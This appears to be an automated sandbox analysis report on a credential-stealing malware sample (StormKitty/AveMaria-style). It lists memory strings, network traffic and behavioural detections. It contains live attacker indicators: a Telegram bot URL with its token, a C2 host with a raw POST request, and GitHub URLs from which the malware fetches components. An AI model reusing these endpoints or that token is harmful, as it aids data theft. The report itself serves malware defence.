Source: svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.304315459.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.305330461.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr, nss3.dll.4.dr, freebl3.dll.4.dr, mozglue.dll.4.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.304315459.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.305330461.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr, nss3.dll.4.dr, freebl3.dll.4.dr, mozglue.dll.4.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: chormuim.exe, 00000008.00000000.373931616.000000001BA2C000.00000004.00000010.sdmp, chormuim.exe, 00000008.00000000.366204607.000000001BA2C000.00000004.00000010.sdmp String found in binary or memory: http://crl.globals
Source: chormuim.exe, 00000008.00000002.409485125.000000001BA2C000.00000004.00000010.sdmp, chormuim.exe, 00000008.00000000.373931616.000000001BA2C000.00000004.00000010.sdmp, chormuim.exe, 00000008.00000000.366204607.000000001BA2C000.00000004.00000010.sdmp, WerFault.exe, 0000001D.00000003.396683828.0000026D6FF03000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000002.398019277.0000026D6FF03000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.304315459.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.305330461.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr, nss3.dll.4.dr, freebl3.dll.4.dr, mozglue.dll.4.dr String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.304315459.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.305330461.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr, nss3.dll.4.dr, freebl3.dll.4.dr, mozglue.dll.4.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.304315459.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.305330461.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr, nss3.dll.4.dr, freebl3.dll.4.dr, mozglue.dll.4.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.304315459.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.305330461.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr, nss3.dll.4.dr, freebl3.dll.4.dr, mozglue.dll.4.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.304315459.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.305330461.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr, nss3.dll.4.dr, freebl3.dll.4.dr, mozglue.dll.4.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: chormuim.exe, 00000008.00000002.407468863.0000000002B0D000.00000004.00000001.sdmp String found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
Source: chormuim.exe, 00000008.00000002.407468863.0000000002B0D000.00000004.00000001.sdmp String found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
Source: chormuim.exe, 00000008.00000000.356408248.0000000002903000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000002.406912489.0000000002913000.00000004.00000001.sdmp String found in binary or memory: http://icanhazip.com
Source: chormuim.exe, 00000008.00000000.356408248.0000000002903000.00000004.00000001.sdmp String found in binary or memory: http://icanhazip.com/
Source: chormuim.exe, 00000008.00000000.356408248.0000000002903000.00000004.00000001.sdmp String found in binary or memory: http://icanhazip.com/8
Source: chormuim.exe, 00000008.00000000.356408248.0000000002903000.00000004.00000001.sdmp String found in binary or memory: http://icanhazip.comx
Source: chormuim.exe, 00000008.00000000.371044114.00000000029DD000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.356697477.00000000029F7000.00000004.00000001.sdmp String found in binary or memory: http://ip-api.com
Source: chormuim.exe, 00000008.00000000.356697477.00000000029F7000.00000004.00000001.sdmp String found in binary or memory: http://ip-api.com/line/?fields=h
Source: chormuim.exe, 00000008.00000000.356697477.00000000029F7000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.355408259.0000000002691000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000002.406228414.0000000002691000.00000004.00000001.sdmp String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: chormuim.exe, 00000008.00000000.370201907.0000000002691000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.355408259.0000000002691000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000002.406228414.0000000002691000.00000004.00000001.sdmp String found in binary or memory: http://ip-api.comV
Source: chormuim.exe, 00000008.00000000.371044114.00000000029DD000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.356697477.00000000029F7000.00000004.00000001.sdmp String found in binary or memory: http://ip-api.comx
Source: svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.304315459.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.305330461.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr, nss3.dll.4.dr, freebl3.dll.4.dr, mozglue.dll.4.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.304315459.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.305330461.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr, nss3.dll.4.dr, freebl3.dll.4.dr, mozglue.dll.4.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.304315459.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.305330461.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr, nss3.dll.4.dr, freebl3.dll.4.dr, mozglue.dll.4.dr String found in binary or memory: http://ocsp.thawte.com0
Source: svchoste.exe, 00000004.00000002.329775240.0000000001312000.00000004.00000020.sdmp String found in binary or memory: http://pplonline.org/Cgi/
Source: svchoste.exe, 00000004.00000002.329735600.00000000012BA000.00000004.00000020.sdmp String found in binary or memory: http://pplonline.org/Cgi//1.jpg
Source: svchoste.exe, 00000004.00000002.329735600.00000000012BA000.00000004.00000020.sdmp String found in binary or memory: http://pplonline.org/Cgi//1.jpgU
Source: svchoste.exe, 00000004.00000002.329735600.00000000012BA000.00000004.00000020.sdmp String found in binary or memory: http://pplonline.org/Cgi//2.jpg
Source: svchoste.exe, 00000004.00000002.329735600.00000000012BA000.00000004.00000020.sdmp String found in binary or memory: http://pplonline.org/Cgi//2.jpg2
Source: svchoste.exe, 00000004.00000002.329735600.00000000012BA000.00000004.00000020.sdmp String found in binary or memory: http://pplonline.org/Cgi//3.jpg
Source: svchoste.exe, 00000004.00000002.329735600.00000000012BA000.00000004.00000020.sdmp String found in binary or memory: http://pplonline.org/Cgi//3.jpgK
Source: svchoste.exe, 00000004.00000002.329735600.00000000012BA000.00000004.00000020.sdmp String found in binary or memory: http://pplonline.org/Cgi//4.jpg
Source: svchoste.exe, 00000004.00000002.329735600.00000000012BA000.00000004.00000020.sdmp String found in binary or memory: http://pplonline.org/Cgi//5.jpg
Source: svchoste.exe, 00000004.00000002.329735600.00000000012BA000.00000004.00000020.sdmp String found in binary or memory: http://pplonline.org/Cgi//6.jpg
Source: svchoste.exe, 00000004.00000002.329735600.00000000012BA000.00000004.00000020.sdmp String found in binary or memory: http://pplonline.org/Cgi//7.jpg
Source: svchoste.exe, 00000004.00000002.329735600.00000000012BA000.00000004.00000020.sdmp String found in binary or memory: http://pplonline.org/Cgi//main.php
Source: WerFault.exe, 0000001D.00000003.382485433.0000026D70BB0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication
Source: WerFault.exe, 0000001D.00000003.382485433.0000026D70BB0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o
Source: WerFault.exe, 0000001D.00000003.382485433.0000026D70BB0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005
Source: WerFault.exe, 0000001D.00000003.382485433.0000026D70BB0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
Source: WerFault.exe, 0000001D.00000003.382485433.0000026D70BB0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200
Source: WerFault.exe, 0000001D.00000003.382485433.0000026D70BB0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality
Source: WerFault.exe, 0000001D.00000003.382485433.0000026D70BB0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone
Source: chormuim.exe, 00000008.00000000.370201907.0000000002691000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.355408259.0000000002691000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000002.406228414.0000000002691000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.382485433.0000026D70BB0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: WerFault.exe, 0000001D.00000003.382485433.0000026D70BB0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
Source: WerFault.exe, 0000001D.00000003.382485433.0000026D70BB0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone
Source: WerFault.exe, 0000001D.00000003.382485433.0000026D70BB0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/
Source: WerFault.exe, 0000001D.00000003.382485433.0000026D70BB0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince
Source: WerFault.exe, 0000001D.00000003.382485433.0000026D70BB0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20
Source: WerFault.exe, 0000001D.00000003.382485433.0000026D70BB0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/
Source: WerFault.exe, 0000001D.00000003.382485433.0000026D70BB0000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.o
Source: svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.304315459.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.305330461.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr, nss3.dll.4.dr, freebl3.dll.4.dr, mozglue.dll.4.dr String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.304315459.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.305330461.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr, nss3.dll.4.dr, freebl3.dll.4.dr, mozglue.dll.4.dr String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.304315459.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.305330461.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr, nss3.dll.4.dr, freebl3.dll.4.dr, mozglue.dll.4.dr String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: Amcache.hve.29.dr String found in binary or memory: http://upx.sf.net
Source: DotNetZip.dll.8.dr String found in binary or memory: http://www.codeplex.com/DotNetZip
Source: mozglue.dll.4.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.304315459.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.305330461.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr, nss3.dll.4.dr, freebl3.dll.4.dr, mozglue.dll.4.dr String found in binary or memory: http://www.mozilla.com0
Source: svchoste.exe, 00000004.00000003.318310238.0000000001366000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.371716058.0000000002C06000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000002.407794695.0000000002C06000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.370970662.0000000002982000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.356577085.0000000002982000.00000004.00000001.sdmp, tmp3B84.tmp.dat.8.dr, temp.4.dr, tmp7B6F.tmp.dat.8.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chormuim.exe, 00000008.00000000.356875831.0000000002AEF000.00000004.00000001.sdmp String found in binary or memory: https://api.tele
Source: chormuim.exe, 00000008.00000000.371882143.0000000002C73000.00000004.00000001.sdmp String found in binary or memory: https://api.telegrP
Source: chormuim.exe, 00000008.00000000.371882143.0000000002C73000.00000004.00000001.sdmp String found in binary or memory: https://api.telegram.org
Source: chormuim.exe, 00000008.00000000.370391280.0000000002790000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.371765057.0000000002C35000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.356875831.0000000002AEF000.00000004.00000001.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: chormuim.exe, 00000008.00000000.370391280.0000000002790000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.371882143.0000000002C73000.00000004.00000001.sdmp String found in binary or memory: https://api.telegram.org/bot1456609378:AAEnBfmWHEJfWWOpiWK1aoQnqzDubVAn7J4/getMe
Source: chormuim.exe, 00000008.00000000.370391280.0000000002790000.00000004.00000001.sdmp String found in binary or memory: https://api.telegram.orgx
Source: svchoste.exe, 00000004.00000003.318310238.0000000001366000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.371716058.0000000002C06000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000002.407794695.0000000002C06000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.370970662.0000000002982000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.356577085.0000000002982000.00000004.00000001.sdmp, tmp3B84.tmp.dat.8.dr, temp.4.dr, tmp7B6F.tmp.dat.8.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: svchoste.exe, 00000004.00000003.318310238.0000000001366000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.371716058.0000000002C06000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000002.407794695.0000000002C06000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.370970662.0000000002982000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.356577085.0000000002982000.00000004.00000001.sdmp, tmp3B84.tmp.dat.8.dr, temp.4.dr, tmp7B6F.tmp.dat.8.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: svchoste.exe, 00000004.00000003.318310238.0000000001366000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.371716058.0000000002C06000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000002.407794695.0000000002C06000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.370970662.0000000002982000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.356577085.0000000002982000.00000004.00000001.sdmp, tmp3B84.tmp.dat.8.dr, temp.4.dr, tmp7B6F.tmp.dat.8.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: svchoste.exe, 00000004.00000003.318310238.0000000001366000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.371716058.0000000002C06000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000002.407794695.0000000002C06000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.370970662.0000000002982000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.356577085.0000000002982000.00000004.00000001.sdmp, tmp3B84.tmp.dat.8.dr, temp.4.dr, tmp7B6F.tmp.dat.8.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: chormuim.exe.6.dr String found in binary or memory: https://github.com/LimerBoy/StormKitty
Source: chormuim.exe, 00000008.00000002.408878521.000000001B711000.00000004.00000001.sdmp String found in binary or memory: https://java.sun.com
Source: chormuim.exe, 00000008.00000000.355699138.00000000026F3000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.370261870.00000000026F3000.00000004.00000001.sdmp String found in binary or memory: https://raw.githubusercontent.com
Source: chormuim.exe, 00000008.00000002.406228414.0000000002691000.00000004.00000001.sdmp String found in binary or memory: https://raw.githubusercontent.com/caxmd/StormKitty/master/StormKitty/stub/packages/AnonFileApi.1.14.
Source: chormuim.exe, 00000008.00000002.406228414.0000000002691000.00000004.00000001.sdmp String found in binary or memory: https://raw.githubusercontent.com/caxmd/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.13.8/
Source: svchoste.exe, 00000004.00000003.318310238.0000000001366000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.371716058.0000000002C06000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000002.407794695.0000000002C06000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.370970662.0000000002982000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.356577085.0000000002982000.00000004.00000001.sdmp, tmp3B84.tmp.dat.8.dr, temp.4.dr, tmp7B6F.tmp.dat.8.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: svchoste.exe, 00000004.00000003.318310238.0000000001366000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.371716058.0000000002C06000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000002.407794695.0000000002C06000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.370970662.0000000002982000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.356577085.0000000002982000.00000004.00000001.sdmp, tmp3B84.tmp.dat.8.dr, temp.4.dr, tmp7B6F.tmp.dat.8.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: chormuim.exe, 00000008.00000002.407468863.0000000002B0D000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
Source: svchoste.exe, 00000004.00000002.330933696.0000000003820000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000002.407468863.0000000002B0D000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: chormuim.exe, 00000008.00000002.407468863.0000000002B0D000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
Source: svchoste.exe, 00000004.00000002.330933696.0000000003820000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000002.407468863.0000000002B0D000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.304315459.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.305330461.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr, nss3.dll.4.dr, freebl3.dll.4.dr, mozglue.dll.4.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: svchoste.exe, 00000004.00000003.318310238.0000000001366000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.371716058.0000000002C06000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000002.407794695.0000000002C06000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.370970662.0000000002982000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.356577085.0000000002982000.00000004.00000001.sdmp, tmp3B84.tmp.dat.8.dr, temp.4.dr, tmp7B6F.tmp.dat.8.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown DNS traffic detected: queries for: pplonline.org
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B91CF0 InternetSetFilePointer,InternetReadFile,_memset,HttpQueryInfoA,_memcpy_s,_memcpy_s, 4_2_00B91CF0
Source: global traffic HTTP traffic detected: GET /caxmd/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.13.8/lib/net40/DotNetZip.dll HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /caxmd/StormKitty/master/StormKitty/stub/packages/AnonFileApi.1.14.6/lib/net40/AnonFileApi.dll HTTP/1.1Host: raw.githubusercontent.com
Source: global traffic HTTP traffic detected: GET /bot1456609378:AAEnBfmWHEJfWWOpiWK1aoQnqzDubVAn7J4/getMe HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: chormuim.exe, 00000008.00000002.407468863.0000000002B0D000.00000004.00000001.sdmp String found in binary or memory: ium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"*DivX Web Player*","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"*Facebook Video*","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"*Chrome PDF Viewer*","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"*Chrome PDF Plugin*","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"*Google Earth*","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"*Google Talk*","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"*IBM*Java*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-java
Source: unknown HTTP traffic detected: POST /Cgi//6.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: pplonline.orgConnection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: unknown HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.3:49745 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49747 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Creates a DirectInput object (often for capturing keystrokes)
Source: svchoste.exe, 00000004.00000002.329735600.00000000012BA000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Creates a window with clipboard capturing capabilities
Source: C:\ProgramData\AMD Driver\taskshell.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\ProgramData\AMD Driver\taskshell.exe Window created: window name: CLIPBRDWNDCLASS
Source: C:\ProgramData\AMD Driver\taskshell.exe Window created: window name: CLIPBRDWNDCLASS

E-Banking Fraud:

barindex
Yara detected AveMaria stealer
Source: Yara match File source: 00000008.00000000.370201907.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.355408259.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.406228414.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: chormuim.exe PID: 6504, type: MEMORYSTR

System Summary:

barindex
Detected VMProtect packer
Source: AnonFileApi.dll.8.dr Static PE information: .vmp0 and .vmp1 section names
.NET source code contains very large strings
Source: dll.exe.0.dr, Forms.cs Long String: Length: 14336
Source: 5.2.dll.exe.10000.0.unpack, Forms.cs Long String: Length: 14336
Source: 5.0.dll.exe.10000.0.unpack, Forms.cs Long String: Length: 14336
One or more processes crash
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6504 -s 1360
Detected potential crypto function
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Code function: 0_2_0096D4C4 0_2_0096D4C4
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Code function: 0_2_0096E5BE 0_2_0096E5BE
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Code function: 0_2_0096CDCC 0_2_0096CDCC
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Code function: 0_2_00961D11 0_2_00961D11
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Code function: 0_2_00007FFC08955E77 0_2_00007FFC08955E77
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B83C90 4_2_00B83C90
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B83480 4_2_00B83480
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B83060 4_2_00B83060
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B83AA0 4_2_00B83AA0
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B74B10 4_2_00B74B10
